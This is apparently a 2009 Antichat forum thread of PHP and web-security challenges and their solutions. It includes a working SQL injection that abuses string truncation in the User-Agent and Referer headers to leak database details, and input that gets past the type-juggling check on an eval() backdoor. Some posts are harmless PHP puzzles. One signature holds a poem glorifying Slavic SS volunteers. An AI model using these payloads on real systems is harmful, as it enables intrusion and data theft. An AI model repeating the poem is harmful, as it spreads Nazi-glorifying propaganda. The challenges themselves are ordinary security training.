11.11.2009, 15:25
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
С нами:
9410786
Репутация:
2731
|
|
Сообщение от (Dm)
если ты эт про мое задание, напиши как выполнить sql инъекцию.
Да очень просто... Я уже один раз встречался с подобным 
Юзер-агент ставим:
Код:
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000\
Реферер:
Код:
, concat_ws(0x3a,user(),database(),version())) --
И таким образом в поле "Реферер" запишется юзер, бд, версия. Почему? Да потому что substr() обрезает строку до 255 символов, а у нас она 256 символов - 254 нуля и слешированый слеш, тоесть \\. Ну а дальше по логике запроса идет:
Код:
INSERT INTO stats (ip, useragent, referer)
VALUES
(
'127.0.0.1',
'000...много нулей...00\',',
concat_ws(0x3a,user(),database(),version())
)
--')
ЗЫ: Вот тут была похожая ситуация:
http://forum.antichat.ru/threadnav134652-1-10.html
|
|
|
08.11.2009, 09:39
|
|
Участник форума
Регистрация: 02.04.2006
Сообщений: 273
С нами:
10582516
Репутация:
114
|
|
Еще более компактный код в ответ на 11 вопрос
PHP код:
$str='
383 текст с числами 5838
635 еще текст 001 462
432текст564
';
$str=preg_replace("/(\d+)/se","'0x'.strtoupper(dechex(\\1))",$str);
print $str;
|
|
|
|
09.11.2009, 15:38
|
|
Участник форума
Регистрация: 07.12.2006
Сообщений: 192
С нами:
10223973
Репутация:
123
|
|
по поводу задания 41:
get_included_files()
функция выдаст сначала файл, из которого произошёл вызов, а затем всё что в нём заинклудилось.
задание 42:
PHP код:
<?php
function arr($amt)
{
$a=array();
$tmp=&$a;
for($i=0;$i<$amt-2;$i++)
{
$tmp=&$tmp[0];
$tmp[0]=array();
}
return $a;
}
?>
тока в последнем одна проблема - там, почему то предпоследний вложенный массив - ссылка, ну да не суть, вложенность всё равно нужная, и фактически это и есть массив, просто ссылается на место хранения другой переменной) |
|
|
|
11.11.2009, 12:09
|
|
Reservists Of Antichat - Level 6
Регистрация: 15.03.2009
Сообщений: 560
С нами:
9030566
Репутация:
2017
|
|
PHP код:
<?php
$a = (int) $_GET['a'];
if ($_GET['a'] == 1)
exit;
elseif($a == 1)
eval ($_GET['b']);
?>
Вывести phpinfo(); всеми способами
__________________
В сырых могилах Второй Мировой
Солдатам снятся цветные сны.
Их кости порой видны под первой травой,
Когда сойдет снег в начале весны.
Славяне тоже сражались в отрядах СС
За чистоту арийской крови.
Теперь они дремлют за чертою небес,
Но снова встанут на бой, лишь позови.
|
|
|
|
11.11.2009, 16:54
|
|
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
С нами:
9154406
Репутация:
2221
|
|
Сообщение от HAXTA4OK
PHP код:
<?php
$a = (int) $_GET['a'];
if ($_GET['a'] == 1)
exit;
elseif($a == 1)
eval ($_GET['b']);
?>
Вывести phpinfo(); всеми способами всё
|
|
|
|
11.11.2009, 15:33
|
|
Reservists Of Antichat - Level 6
Регистрация: 08.04.2008
Сообщений: 286
С нами:
9521666
Репутация:
1695
|
|
mailbrush, молодец) что выполнил задание... тебе +
__________________
Cервер cs 1.6
cs.antichat.net:27015
|
|
|
|
11.11.2009, 16:35
|
|
Флудер
Регистрация: 12.08.2004
Сообщений: 3,791
С нами:
11444066
Репутация:
2290
|
|
Задание 006: просто зайти. Пароль не потребует  |
|
|
|
11.11.2009, 17:08
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
С нами:
9410786
Репутация:
2731
|
|
Ctacok, не все
Код:
?a=1e10&b=phpinfo();
|
|
|
|
11.11.2009, 18:47
|
|
Постоянный
Регистрация: 27.07.2008
Сообщений: 614
С нами:
9362947
Репутация:
1196
|
|
многомерный массив
Код:
?a[[[[[[[]]]]]]]=1&b=phpinfo();
|
|
|
|
12.11.2009, 16:32
|
|
Banned
Регистрация: 14.01.2009
Сообщений: 515
С нами:
9116877
Репутация:
468
|
|
3 новых задания!
+ 042 заменил т.к. оно было похоже на одно из предыдущих.
Перенес все задания в первый пост.
Он заполнен.
Теперь во втором посте буду писать задания.
Когда и он переполнится, создам новую тему.
Спасибо всем кто добавляет свои задания.
УДАЧИ!
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
